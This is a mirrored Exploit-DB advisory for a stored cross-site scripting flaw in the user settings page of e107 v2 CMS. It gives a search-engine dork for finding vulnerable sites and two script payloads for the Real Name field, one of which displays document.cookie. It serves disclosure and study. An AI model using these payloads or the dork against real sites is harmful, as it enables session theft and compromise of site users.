bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/35679.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

48 lines
No EOL
933 B
Text
Raw Blame History

_____ _____ ______
| _ | | _ ||___ /
| |/' |_ __| |_| | / /
| /| \ \/ /\____ | / /
\ |_/ /> < .___/ /./ /
\___//_/\_\\____/ \_/
by bl4ck s3c
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
# Vulnerability Description:
CMS user details section is vulnerable to XSS. You can run XSS payloads.
XSS Vulnerability #1:
Go Update user settings page
"http://{target-url}/usersettings.php"
Set Real Name value;
"><script>alert(String.fromCharCode(88, 83, 83))</script>
or
"><script>alert(document.cookie)</script>
========
Credits:
========
Vulnerability found and advisory written by Ahmet Agar.
===========
References:
===========
http://www.0x97.info
htts://twitter.com/_HacKingZ_
Reference in a new issue View git blame Copy permalink